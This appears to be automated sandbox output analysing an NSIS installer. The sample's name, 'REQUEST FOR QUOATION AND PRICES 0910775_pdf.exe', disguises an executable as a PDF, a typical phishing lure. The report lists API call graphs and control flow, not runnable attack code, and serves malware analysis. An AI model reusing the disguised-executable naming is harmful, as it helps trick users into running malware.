4034b4 GetTempPathW 3821 40326f 3736->3821 3738 4034cc 3739 4034d0 GetWindowsDirectoryW lstrcatW 3738->3739 3740 403526 DeleteFileW 3738->3740 3742 40326f 12 API calls 3739->3742 3831 402dee GetTickCount GetModuleFileNameW 3740->3831 3741 4033a2 3743 405a36 CharNextW 3741->3743 3749 40349f 3741->3749 3751 40349d 3741->3751 3745 4034ec 3742->3745 3743->3741 3745->3740 3747 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3745->3747 3746 40353a 3752 405a36 CharNextW 3746->3752 3788 4035dd 3746->3788 3801 4035ed 3746->3801 3750 40326f 12 API calls 3747->3750 3915 406055 lstrcpynW 3749->3915 3756 40351e 3750->3756 3751->3736 3768 403559 3752->3768 3756->3740 3756->3801 3757 403728 3760 403730 GetCurrentProcess OpenProcessToken 3757->3760 3761 4037ac ExitProcess 3757->3761 3758 403608 3939 40579a 3758->3939 3766 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3760->3766 3767 40377c 3760->3767 3763 4035b7 3916 405b11 3763->3916 3764 40361e 3943 40571d 3764->3943 3766->3767 3771 40642b 5 API calls 3767->3771 3768->3763 3768->3764 3782 403783 3771->3782 3774 403798 ExitWindowsEx 3774->3761 3777 4037a5 3774->3777 3775 403634 lstrcatW 3776 40363f lstrcatW lstrcmpiW 3775->3776 3779 40365b 3776->3779 3776->3801 3981 40140b 3777->3981 3780 403660 3779->3780 3781 403667 3779->3781 3946 405683 CreateDirectoryW 3780->3946 3951 405700 CreateDirectoryW 3781->3951 3782->3774 3782->3777 3784 4035d2 3931 406055 lstrcpynW 3784->3931 3859 40389e 3788->3859 3790 40366c SetCurrentDirectoryW 3791 403687 3790->3791 3792 40367c 3790->3792 3955 406055 lstrcpynW 3791->3955 3954 406055 lstrcpynW 3792->3954 3797 4036d3 CopyFileW 3803 403695 3797->3803 3798 40371c 3800 405ef6 38 API calls 3798->3800 3800->3801 3932 4037c4 3801->3932 3802 406077 18 API calls 3802->3803 3803->3798 3803->3802 3805 403707 CloseHandle 3803->3805 3956 406077 3803->3956 3974 405ef6 MoveFileExW 3803->3974 3978 405735 CreateProcessW 3803->3978 3805->3803 3807 4063e1 wsprintfW LoadLibraryW 3806->3807 3807->3720 3810 406451 GetProcAddress 3809->3810 3811 406447 3809->3811 3813 40330c 3810->3813 3812 4063bf 3 API calls 3811->3812 3814 40644d 3812->3814 3813->3727 3814->3810 3814->3813 3815->3730 3816->3732 3818 405a3c 3817->3818 3819 403389 CharNextW 3818->3819 3820 405a43 CharNextW 3818->3820 3819->3736 3819->3741 3820->3818 3984 4062e9 3821->3984 3823 403285 3823->3738 3824 40327b 3824->3823 3993 405a09 lstrlenW CharPrevW 3824->3993 3827 405700 2 API calls 3828 403293 3827->3828 3996 405c59 3828->3996 4000 405c2a GetFileAttributesW CreateFileW 3831->4000 3833 402e2e 3852 402e3e 3833->3852 4001 406055 lstrcpynW 3833->4001 3835 402e54 4002 405a55 lstrlenW 3835->4002 3839 402e65 GetFileSize 3840 402f61 3839->3840 3858 402e7c 3839->3858 4007 402d8a 3840->4007 3842 402f6a 3844 402f9a GlobalAlloc 3842->3844 3842->3852 4042 403258 SetFilePointer 3842->4042 4018 403258 SetFilePointer 3844->4018 3847 402fcd 3849 402d8a 6 API calls 3847->3849 3848 402fb5 4019 403027 3848->4019 3849->3852 3850 402f83 3853 403242 ReadFile 3850->3853 3852->3746 3855 402f8e 3853->3855 3854 402d8a 6 API calls 3854->3858 3855->3844 3855->3852 3856 402fc1 3856->3852 3856->3856 3857 402ffe SetFilePointer 3856->3857 3857->3852 3858->3840 3858->3847 3858->3852 3858->3854 4039 403242 3858->4039 3860 40642b 5 API calls 3859->3860 3861 4038b2 3860->3861 3862 4038b8 GetUserDefaultUILanguage 3861->3862 3863 4038ca 3861->3863 4063 405f9c wsprintfW 3862->4063 4073 405f22 RegOpenKeyExW 3863->4073 3866 4038c8 4064 403b74 3866->4064 3868 403919 lstrcatW 3868->3866 3869 405f22 3 API calls 3869->3868 3872 405b11 18 API calls 3873 40394b 3872->3873 3874 4039df 3873->3874 3877 405f22 3 API calls 3873->3877 3875 405b11 18 API calls 3874->3875 3876 4039e5 3875->3876 3879 4039f5 LoadImageW 3876->3879 3880 406077 18 API calls 3876->3880 3878 40397d 3877->3878 3878->3874 3883 40399e lstrlenW 3878->3883 3887 405a36 CharNextW 3878->3887 3881 403a9b 3879->3881 3882 403a1c RegisterClassW 3879->3882 3880->3879 3886 40140b 2 API calls 3881->3886 3884 403a52 SystemParametersInfoW CreateWindowExW 3882->3884 3885 403aa5 3882->3885 3888 4039d2 3883->3888 3889 4039ac lstrcmpiW 3883->3889 3884->3881 3885->3801 3890 403aa1 3886->3890 3891 40399b 3887->3891 3893 405a09 3 API calls 3888->3893 3889->3888 3892 4039bc GetFileAttributesW 3889->3892 3890->3885 3895 403b74 19 API calls 3890->3895 3891->3883 3894 4039c8 3892->3894 3896 4039d8 3893->3896 3894->3888 3897 405a55 2 API calls 3894->3897 3898 403ab2 3895->3898 4078 406055 lstrcpynW 3896->4078 3897->3888 3900 403b41 3898->3900 3901 403abe ShowWindow 3898->3901 4079 405287 OleInitialize 3900->4079 3903 4063bf 3 API calls 3901->3903 3904 403ad6 3903->3904 3906 403ae4 GetClassInfoW 3904->3906 3908 4063bf 3 API calls 3904->3908 3905 403b47 3907 403b63 3905->3907 3912 403b4b 3905->3912 3910 403af8 GetClassInfoW RegisterClassW 3906->3910 3911 403b0e DialogBoxParamW 3906->3911 3909 40140b 2 API calls 3907->3909 3908->3906 3909->3885 3910->3911 3913 40140b 2 API calls 3911->3913 3912->3885 3914 40140b 2 API calls 3912->3914 3913->3885 3914->3885 3915->3751 4094 406055 lstrcpynW 3916->4094 3918 405b22 4095 405ab4 CharNextW CharNextW 3918->4095 3921 4035c3 3921->3801 3930 406055 lstrcpynW 3921->3930 3922 4062e9 5 API calls 3923 405b38 3922->3923 3923->3921 3924 405b69 lstrlenW 3923->3924 3929 405a55 2 API calls 3923->3929 4101 406398 FindFirstFileW 3923->4101 3924->3923 3925 405b74 3924->3925 3926 405a09 3 API calls 3925->3926 3928 405b79 GetFileAttributesW 3926->3928 3928->3921 3929->3924 3930->3784 3931->3788 3933 4037dc 3932->3933 3934 4037ce CloseHandle 3932->3934 4104 403809 3933->4104 3934->3933 3940 4057af 3939->3940 3941 403616 ExitProcess 3940->3941 3942 4057c3 MessageBoxIndirectW 3940->3942 3942->3941 3944 40642b 5 API calls 3943->3944 3945 403623 lstrcatW 3944->3945 3945->3775 3945->3776 3947 403665 3946->3947 3948 4056d4 GetLastError 3946->3948 3947->3790 3948->3947 3949 4056e3 SetFileSecurityW 3948->3949 3949->3947 3950 4056f9 GetLastError 3949->3950 3950->3947 3952 405710 3951->3952 3953 405714 GetLastError 3951->3953 3952->3790 3953->3952 3954->3791 3955->3803 3965 406084 3956->3965 3957 4062cf 3958 4036c6 DeleteFileW 3957->3958 4163 406055 lstrcpynW 3957->4163 3958->3797 3958->3803 3960 406137 GetVersion 3960->3965 3961 40629d lstrlenW 3961->3965 3964 406077 10 API calls 3964->3961 3965->3957 3965->3960 3965->3961 3965->3964 3966 405f22 3 API calls 3965->3966 3967 4061b2 GetSystemDirectoryW 3965->3967 3968 4061c5 GetWindowsDirectoryW 3965->3968 3969 4062e9 5 API calls 3965->3969 3970 4061f9 SHGetSpecialFolderLocation 3965->3970 3971 406077 10 API calls 3965->3971 3972 40623e lstrcatW 3965->3972 4161 405f9c wsprintfW 3965->4161 4162 406055 lstrcpynW 3965->4162 3966->3965 3967->3965 3968->3965 3969->3965 3970->3965 3973 406211 SHGetPathFromIDListW CoTaskMemFree 3970->3973 3971->3965 3972->3965 3973->3965 3975 405f17 3974->3975 3976 405f0a 3974->3976 3975->3803 4164 405d84 lstrcpyW 3976->4164 3979 405774 3978->3979 3980 405768 CloseHandle 3978->3980 3979->3803 3980->3979 3982 401389 2 API calls 3981->3982 3983 401420 3982->3983 3983->3761 3990 4062f6 3984->3990 3985 40636c 3986 406371 CharPrevW 3985->3986 3988 406392 3985->3988 3986->3985 3987 40635f CharNextW 3987->3985 3987->3990 3988->3824 3989 405a36 CharNextW 3989->3990 3990->3985 3990->3987 3990->3989 3991 40634b CharNextW 3990->3991 3992 40635a CharNextW 3990->3992 3991->3990 3992->3987 3994 40328d 3993->3994 3995 405a25 lstrcatW 3993->3995 3994->3827 3995->3994 3997 405c66 GetTickCount GetTempFileNameW 3996->3997 3998 40329e 3997->3998 3999 405c9c 3997->3999 3998->3738 3999->3997 3999->3998 4000->3833 4001->3835 4003 405a63 4002->4003 4004 402e5a 4003->4004 4005 405a69 CharPrevW 4003->4005 4006 406055 lstrcpynW 4004->4006 4005->4003 4005->4004 4006->3839 4008 402d93 4007->4008 4009 402dab 4007->4009 4010 402da3 4008->4010 4011 402d9c DestroyWindow 4008->4011 4012 402db3 4009->4012 4013 402dbb GetTickCount 4009->4013 4010->3842 4011->4010 4043 406467 4012->4043 4015 402dc9 CreateDialogParamW ShowWindow 4013->4015 4016 402dec 4013->4016 4015->4016 4016->3842 4018->3848 4020 403040 4019->4020 4021 40306e 4020->4021 4049 403258 SetFilePointer 4020->4049 4023 403242 ReadFile 4021->4023 4024 403079 4023->4024 4025 4031db 4024->4025 4026 40308b GetTickCount 4024->4026 4034 4031c5 4024->4034 4027 40321d 4025->4027 4032 4031df 4025->4032 4026->4034 4038 4030da 4026->4038 4028 403242 ReadFile 4027->4028 4028->4034 4029 403242 ReadFile 4029->4038 4030 403242 ReadFile 4030->4032 4031 405cdc WriteFile 4031->4032 4032->4030 4032->4031 4032->4034 4033 403130 GetTickCount 4033->4038 4034->3856 4035 403155 MulDiv wsprintfW 4050 4051b4 4035->4050 4038->4029 4038->4033 4038->4034 4038->4035 4047 405cdc WriteFile 4038->4047 4061 405cad ReadFile 4039->4061 4042->3850 4044 406484 PeekMessageW 4043->4044 4045 402db9 4044->4045 4046 40647a DispatchMessageW 4044->4046 4045->3842 4046->4044 4048 405cfa 4047->4048 4048->4038 4049->4021 4051 405271 4050->4051 4052 4051cf 4050->4052 4051->4038 4053 4051eb lstrlenW 4052->4053 4054 406077 18 API calls 4052->4054 4055 405214 4053->4055 4056 4051f9 lstrlenW 4053->4056 4054->4053 4058 405227 4055->4058 4059 40521a SetWindowTextW 4055->4059 4056->4051 4057 40520b lstrcatW 4056->4057 4057->4055 4058->4051 4060 40522d SendMessageW SendMessageW SendMessageW 4058->4060 4059->4058 4060->4051 4062 403255 4061->4062 4062->3858 4063->3866 4065 403b88 4064->4065 4086 405f9c wsprintfW 4065->4086 4067 403bf9 4068 406077 18 API calls 4067->4068 4069 403c05 SetWindowTextW 4068->4069 4070 403c21 4069->4070 4071 403929 4069->4071 4070->4071 4072 406077 18 API calls 4070->4072 4071->3872 4072->4070 4074 4038fa 4073->4074 4075 405f56 RegQueryValueExW 4073->4075 4074->3868 4074->3869 4076 405f77 RegCloseKey 4075->4076 4076->4074 4078->3874 4087 404165 4079->4087 4081 4052aa 4085 4052d1 4081->4085 4090 401389 4081->4090 4082 404165 SendMessageW 4083 4052e3 OleUninitialize 4082->4083 4083->3905 4085->4082 4086->4067 4088 40417d 4087->4088 4089 40416e SendMessageW 4087->4089 4088->4081 4089->4088 4092 401390 4090->4092 4091 4013fe 4091->4081 4092->4091 4093 4013cb MulDiv SendMessageW 4092->4093 4093->4092 4094->3918 4096 405ad1 4095->4096 4097 405ae3 4095->4097 4096->4097 4098 405ade CharNextW 4096->4098 4099 405a36 CharNextW 4097->4099 4100 405b07 4097->4100 4098->4100 4099->4097 4100->3921 4100->3922 4102 4063b9 4101->4102 4103 4063ae FindClose 4101->4103 4102->3923 4103->4102 4105 403817 4104->4105 4106 4037e1 4105->4106 4107 40381c FreeLibrary GlobalFree 4105->4107 4108 405846 4106->4108 4107->4106 4107->4107 4109 405b11 18 API calls 4108->4109 4110 405866 4109->4110 4111 405885 4110->4111 4112 40586e DeleteFileW 4110->4112 4114 4059b0 4111->4114 4148 406055 lstrcpynW 4111->4148 4113 4035f6 OleUninitialize 4112->4113 4113->3757 4113->3758 4114->4113 4119 406398 2 API calls 4114->4119 4116 4058ab 4117 4058b1 lstrcatW 4116->4117 4118 4058be 4116->4118 4120 4058c4 4117->4120 4121 405a55 2 API calls 4118->4121 4124 4059ca 4119->4124 4122 4058d4 lstrcatW 4120->4122 4123 4058ca 4120->4123 4121->4120 4125 4058df lstrlenW FindFirstFileW 4122->4125 4123->4122 4123->4125 4124->4113 4126 4059ce 4124->4126 4127 405901 4125->4127 4128 4059a5 4125->4128 4129 405a09 3 API calls 4126->4129 4131 405988 FindNextFileW 4127->4131 4141 405846 62 API calls 4127->4141 4143 4051b4 25 API calls 4127->4143 4145 4051b4 25 API calls 4127->4145 4147 405ef6 38 API calls 4127->4147 4149 406055 lstrcpynW 4127->4149 4150 4057fe 4127->4150 4128->4114 4130 4059d4 4129->4130 4132 4057fe 5 API calls 4130->4132 4131->4127 4135 40599e FindClose 4131->4135 4134 4059e0 4132->4134 4136 4059e4 4134->4136 4137 4059fa 4134->4137 4135->4128 4136->4113 4140 4051b4 25 API calls 4136->4140 4138 4051b4 25 API calls 4137->4138 4138->4113 4142 4059f1 4140->4142 4141->4127 4144 405ef6 38 API calls 4142->4144 4143->4131 4146 4059f8 4144->4146 4145->4127 4146->4113 4147->4127 4148->4116 4149->4127 4158 405c05 GetFileAttributesW 4150->4158 4153 405821 DeleteFileW 4156 405827 4153->4156 4154 405819 RemoveDirectoryW 4154->4156 4155 40582b 4155->4127 4156->4155 4157 405837 SetFileAttributesW 4156->4157 4157->4155 4159 40580a 4158->4159 4160 405c17 SetFileAttributesW 4158->4160 4159->4153 4159->4154 4159->4155 4160->4159 4161->3965 4162->3965 4163->3958 4165 405dd2 GetShortPathNameW 4164->4165 4166 405dac 4164->4166 4168 405ef1 4165->4168 4169 405de7 4165->4169 4191 405c2a GetFileAttributesW CreateFileW 4166->4191 4168->3975 4169->4168 4171 405def wsprintfA 4169->4171 4170 405db6 CloseHandle GetShortPathNameW 4170->4168 4172 405dca 4170->4172 4173 406077 18 API calls 4171->4173 4172->4165 4172->4168 4174 405e17 4173->4174 4192 405c2a GetFileAttributesW CreateFileW 4174->4192 4176 405e24 4176->4168 4177 405e33 GetFileSize GlobalAlloc 4176->4177 4178 405e55 4177->4178 4179 405eea CloseHandle 4177->4179 4180 405cad ReadFile 4178->4180 4179->4168 4181 405e5d 4180->4181 4181->4179 4193 405b8f lstrlenA 4181->4193 4184 405e74 lstrcpyA 4187 405e96 4184->4187 4185 405e88 4186 405b8f 4 API calls 4185->4186 4186->4187 4188 405ecd SetFilePointer 4187->4188 4189 405cdc WriteFile 4188->4189 4190 405ee3 GlobalFree 4189->4190 4190->4179 4191->4170 4192->4176 4194 405bd0 lstrlenA 4193->4194 4195 405bd8 4194->4195 4196 405ba9 lstrcmpiA 4194->4196 4195->4184 4195->4185 4196->4195 4197 405bc7 CharNextA 4196->4197 4197->4194 5261 100010e1 5264 10001111 5261->5264 5262 100011d8 GlobalFree 5263 100012ba 2 API calls 5263->5264 5264->5262 5264->5263 5265 100011d3 5264->5265 5266 10001272 2 API calls 5264->5266 5267 10001164 GlobalAlloc 5264->5267 5268 100011f8 GlobalFree 5264->5268 5269 100011c4 GlobalFree 5264->5269 5270 100012e1 lstrcpyW 5264->5270 5265->5262 5266->5269 5267->5264 5268->5264 5269->5264 5270->5264 5271 401ca3 5272 402ba2 18 API calls 5271->5272 5273 401ca9 IsWindow 5272->5273 5274 401a05 5273->5274 5275 402a27 SendMessageW 5276 402a41 InvalidateRect 5275->5276 5277 402a4c 5275->5277 5276->5277 4565 405128 4566 405138 4565->4566 4567 40514c 4565->4567 4569 405195 4566->4569 4570 40513e 4566->4570 4568 405154 IsWindowVisible 4567->4568 4577 405174 4567->4577 4568->4569 4571 405161 4568->4571 4572 40519a CallWindowProcW 4569->4572 4573 404165 SendMessageW 4570->4573 4579 404a7e SendMessageW 4571->4579 4575 405148 4572->4575 4573->4575 4577->4572 4584 404afe 4577->4584 4580 404aa1 GetMessagePos ScreenToClient SendMessageW 4579->4580 4581 404add SendMessageW 4579->4581 4582 404ad5 4580->4582 4583 404ada 4580->4583 4581->4582 4582->4577 4583->4581 4593 406055 lstrcpynW 4584->4593 4586 404b11 4594 405f9c wsprintfW 4586->4594 4588 404b1b 4589 40140b 2 API calls 4588->4589 4590 404b24 4589->4590 4595 406055 lstrcpynW 4590->4595 4592 404b2b 4592->4569 4593->4586 4594->4588 4595->4592 4596 40242a 4607 402cc9 4596->4607 4598 402434 4599 402bbf 18 API calls 4598->4599 4600 40243d 4599->4600 4601 402448 RegQueryValueExW 4600->4601 4602 40281e 4600->4602 4603 402468 4601->4603 4606 40246e RegCloseKey 4601->4606 4603->4606 4611 405f9c wsprintfW 4603->4611 4606->4602 4608 402bbf 18 API calls 4607->4608 4609 402ce2 4608->4609 4610 402cf0 RegOpenKeyExW 4609->4610 4610->4598 4611->4606 5278 40422d lstrcpynW lstrlenW 5279 40172d 5280 402bbf 18 API calls 5279->5280 5281 401734 SearchPathW 5280->5281 5282 40174f 5281->5282 4612 404b30 GetDlgItem GetDlgItem 4613 404b82 7 API calls 4612->4613 4616 404d9b 4612->4616 4614 404c25 DeleteObject 4613->4614 4615 404c18 SendMessageW 4613->4615 4617 404c2e 4614->4617 4615->4614 4622 404e60 4616->4622 4626 404e7f 4616->4626 4629 404dfb 4616->4629 4618 404c3d 4617->4618 4619 404c65 4617->4619 4621 406077 18 API calls 4618->4621 4623 404119 19 API calls 4619->4623 4620 404f2b 4627 404f35 SendMessageW 4620->4627 4634 404f3d 4620->4634 4628 404c47 SendMessageW SendMessageW 4621->4628 4622->4626 4633 404e71 SendMessageW 4622->4633 4624 404c79 4623->4624 4630 404119 19 API calls 4624->4630 4625 405113 4632 404180 8 API calls 4625->4632 4626->4620 4626->4625 4631 404ed8 SendMessageW 4626->4631 4627->4634 4628->4617 4635 404a7e 5 API calls 4629->4635 4648 404c87 4630->4648 4631->4625 4637 404eed SendMessageW 4631->4637 4638 405121 4632->4638 4633->4626 4639 404f56 4634->4639 4640 404f4f ImageList_Destroy 4634->4640 4644 404f66 4634->4644 4647 404e0c 4635->4647 4636 4050d5 4636->4625 4645 4050e7 ShowWindow GetDlgItem ShowWindow 4636->4645 4643 404f00 4637->4643 4641 404f5f GlobalFree 4639->4641 4639->4644 4640->4639 4641->4644 4642 404d5c GetWindowLongW SetWindowLongW 4646 404d75 4642->4646 4653 404f11 SendMessageW 4643->4653 4644->4636 4659 404afe 4 API calls 4644->4659 4662 404fa1 4644->4662 4645->4625 4649 404d93 4646->4649 4650 404d7b ShowWindow 4646->4650 4647->4622 4648->4642 4652 404cd7 SendMessageW 4648->4652 4654 404d56 4648->4654 4657 404d13 SendMessageW 4648->4657 4658 404d24 SendMessageW 4648->4658 4669 40414e SendMessageW 4649->4669 4668 40414e SendMessageW 4650->4668 4652->4648 4653->4620 4654->4642 4654->4646 4656 404d8e 4656->4625 4657->4648 4658->4648 4659->4662 4660 4050ab InvalidateRect 4660->4636 4661 4050c1 4660->4661 4670 404a39 4661->4670 4663 404fcf SendMessageW 4662->4663 4664 404fe5 4662->4664 4663->4664 4664->4660 4665 405046 4664->4665 4667 405059 SendMessageW SendMessageW 4664->4667 4665->4667 4667->4664 4668->4656 4669->4616 4673 404970 4670->4673 4672 404a4e 4672->4636 4674 404989 4673->4674 4675 406077 18 API calls 4674->4675 4676 4049ed 4675->4676 4677 406077 18 API calls 4676->4677 4678 4049f8 4677->4678 4679 406077 18 API calls 4678->4679 4680 404a0e lstrlenW wsprintfW SetDlgItemTextW 4679->4680 4680->4672 5283 4045b4 5284 4045e0 5283->5284 5285 4045f1 5283->5285 5344 40577e GetDlgItemTextW 5284->5344 5287 4045fd GetDlgItem 5285->5287 5288 40465c 5285->5288 5291 404611 5287->5291 5289 404740 5288->5289 5298 406077 18 API calls 5288->5298 5342 4048ef 5288->5342 5289->5342 5346 40577e GetDlgItemTextW 5289->5346 5290 4045eb 5292 4062e9 5 API calls 5290->5292 5293 404625 SetWindowTextW 5291->5293 5296 405ab4 4 API calls 5291->5296 5292->5285 5297 404119 19 API calls 5293->5297 5295 404180 8 API calls 5300 404903 5295->5300 5301 40461b 5296->5301 5302 404641 5297->5302 5303 4046d0 SHBrowseForFolderW 5298->5303 5299 404770 5304 405b11 18 API calls 5299->5304 5301->5293 5308 405a09 3 API calls 5301->5308 5305 404119 19 API calls 5302->5305 5303->5289 5306 4046e8 CoTaskMemFree 5303->5306 5307 404776 5304->5307 5309 40464f 5305->5309 5310 405a09 3 API calls 5306->5310 5347 406055 lstrcpynW 5307->5347 5308->5293 5345 40414e SendMessageW 5309->5345 5317 4046f5 5310->5317 5313 404655 5316 40642b 5 API calls 5313->5316 5314 40472c SetDlgItemTextW 5314->5289 5315 40478d 5318 40642b 5 API calls 5315->5318 5316->5288 5317->5314 5319 406077 18 API calls 5317->5319 5325 404794 5318->5325 5321 404714 lstrcmpiW 5319->5321 5320 4047d5 5348 406055 lstrcpynW 5320->5348 5321->5314 5322 404725 lstrcatW 5321->5322 5322->5314 5324 4047dc 5326 405ab4 4 API calls 5324->5326 5325->5320 5330 405a55 2 API calls 5325->5330 5331 40482d 5325->5331 5327 4047e2 GetDiskFreeSpaceW 5326->5327 5329 404806 MulDiv 5327->5329 5327->5331 5329->5331 5330->5325 5332 40489e 5331->5332 5334 404a39 21 API calls 5331->5334 5333 4048c1 5332->5333 5335 40140b 2 API calls 5332->5335 5349 40413b EnableWindow 5333->5349 5336 40488b 5334->5336 5335->5333 5338 4048a0 SetDlgItemTextW 5336->5338 5339 404890 5336->5339 5338->5332 5341 404970 21 API calls 5339->5341 5340 4048dd 5340->5342 5350 404549 5340->5350 5341->5332 5342->5295 5344->5290 5345->5313 5346->5299 5347->5315 5348->5324 5349->5340 5351 404557 5350->5351 5352 40455c SendMessageW 5350->5352 5351->5352 5352->5342 5353 4027b4 5354 4027ba 5353->5354 5355 4027c2 FindClose 5354->5355 5356 402a4c 5354->5356 5355->5356 5357 4042b6 5358 4042ce 5357->5358 5362 4043e8 5357->5362 5363 404119 19 API calls 5358->5363 5359 404452 5360 404524 5359->5360 5361 40445c GetDlgItem 5359->5361 5368 404180 8 API calls 5360->5368 5364 4044e5 5361->5364 5365 404476 5361->5365 5362->5359 5362->5360 5366 404423 GetDlgItem SendMessageW 5362->5366 5367 404335 5363->5367 5364->5360 5373 4044f7 5364->5373 5365->5364 5372 40449c 6 API calls 5365->5372 5388 40413b EnableWindow 5366->5388 5370 404119 19 API calls 5367->5370 5371 40451f 5368->5371 5375 404342 CheckDlgButton 5370->5375 5372->5364 5376 40450d 5373->5376 5377 4044fd SendMessageW 5373->5377 5374 40444d 5379 404549 SendMessageW 5374->5379 5386 40413b EnableWindow 5375->5386 5376->5371 5378 404513 SendMessageW 5376->5378 5377->5376 5378->5371 5379->5359 5381 404360 GetDlgItem 5387 40414e SendMessageW 5381->5387 5383 404376 SendMessageW 5384 404393 GetSysColor 5383->5384 5385 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5383->5385 5384->5385 5385->5371 5386->5381 5387->5383 5388->5374 5389 401b37 5390 401b88 5389->5390 5392 401b44 5389->5392 5393 401bb2 GlobalAlloc 5390->5393 5394 401b8d 5390->5394 5391 401bcd 5395 406077 18 API calls 5391->5395 5404 402288 5391->5404 5392->5391 5397 401b5b 5392->5397 5396 406077 18 API calls 5393->5396 5394->5404 5410 406055 lstrcpynW 5394->5410 5399 402282 5395->5399 5396->5391 5408 406055 lstrcpynW 5397->5408 5402 40579a MessageBoxIndirectW 5399->5402 5401 401b9f GlobalFree 5401->5404 5402->5404 5403 401b6a 5409 406055 lstrcpynW 5403->5409 5406 401b79 5411 406055 lstrcpynW 5406->5411 5408->5403 5409->5406 5410->5401 5411->5404 5412 402537 5413 402562 5412->5413 5414 40254b 5412->5414 5416 402596 5413->5416 5417 402567 5413->5417 5415 402ba2 18 API calls 5414->5415 5424 402552 5415->5424 5419 402bbf 18 API calls 5416->5419 5418 402bbf 18 API calls 5417->5418 5421 40256e WideCharToMultiByte lstrlenA 5418->5421 5420 40259d lstrlenW 5419->5420 5420->5424 5421->5424 5422 4025ca 5423 4025e0 5422->5423 5425 405cdc WriteFile 5422->5425 5424->5422 5424->5423 5426 405d0b 5 API calls 5424->5426 5425->5423 5426->5422 5427 4014b8 5428 4014be 5427->5428 5429 401389 2 API calls 5428->5429 5430 4014c6 5429->5430 4709 4015b9 4710 402bbf 18 API calls 4709->4710 4711 4015c0 4710->4711 4712 405ab4 4 API calls 4711->4712 4724 4015c9 4712->4724 4713 401629 4715 40165b 4713->4715 4716 40162e 4713->4716 4714 405a36 CharNextW 4714->4724 4719 401423 25 API calls 4715->4719 4717 401423 25 API calls 4716->4717 4718 401635 4717->4718 4728 406055 lstrcpynW 4718->4728 4726 401653 4719->4726 4721 405700 2 API calls 4721->4724 4722 40571d 5 API calls 4722->4724 4723 401642 SetCurrentDirectoryW 4723->4726 4724->4713 4724->4714 4724->4721 4724->4722 4725 40160f GetFileAttributesW 4724->4725 4727 405683 4 API calls 4724->4727 4725->4724 4727->4724 4728->4723 5431 10002a7f 5432 10002a97 5431->5432 5433 1000158f 2 API calls 5432->5433 5434 10002ab2 5433->5434

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 32 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->32 33 403526-403540 DeleteFileW call 402dee 25->33 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 34 403480-40348d call 405a36 31->34 35 4033c8-4033ce 31->35 32->33 50 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 32->50 53 4035f1-403602 call 4037c4 OleUninitialize 33->53 54 403546-40354c 33->54 51 403491-403497 34->51 52 40348f-403490 34->52 36 4033d0-4033d7 35->36 37 4033e8-403421 35->37 41 4033d9-4033dc 36->41 42 4033de 36->42 43 403423-403428 37->43 44 40343e-403478 37->44 41->37 41->42 42->37 43->44 48 40342a-403432 43->48 44->34 49 40347a-40347e 44->49 58 403434-403437 48->58 59 403439 48->59 49->34 60 40349f-4034ad call 406055 49->60 50->33 50->53 51->24 62 40349d 51->62 52->51 71 403728-40372e 53->71 72 403608-403618 call 40579a ExitProcess 53->72 55 4035e1-4035e8 call 40389e 54->55 56 403552-40355d call 405a36 54->56 70 4035ed 55->70 73 4035ab-4035b5 56->73 74 40355f-403594 56->74 58->44 58->59 59->44 63 4034b2 60->63 62->63 63->25 70->53 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 86 4035a3-4035a7 78->86 87 40359c-4035a1 78->87 79->80 81->53 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 86->78 92 4035a9 86->92 87->86 87->92 92->73 95->77 100 4037a5-4037a7 call 40140b 95->100 96->95 96->100 97->55 98->99 99->53 102 40365b-40365e 99->102 100->77 103 403660-403665 call 405683 102->103 104 403667 call 405700 102->104 113 40366c-40367a SetCurrentDirectoryW 103->113 104->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 124 40371c-403723 call 405ef6 122->124 123->122 125 4036e5-403705 call 405ef6 call 406077 call 405735 123->125 124->53 125->122 134 403707-40370e CloseHandle 125->134 134->122
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                                  • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                  • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000000), ref: 00403363
                                                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe",00000020), ref: 0040338A
                                                                                                                                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
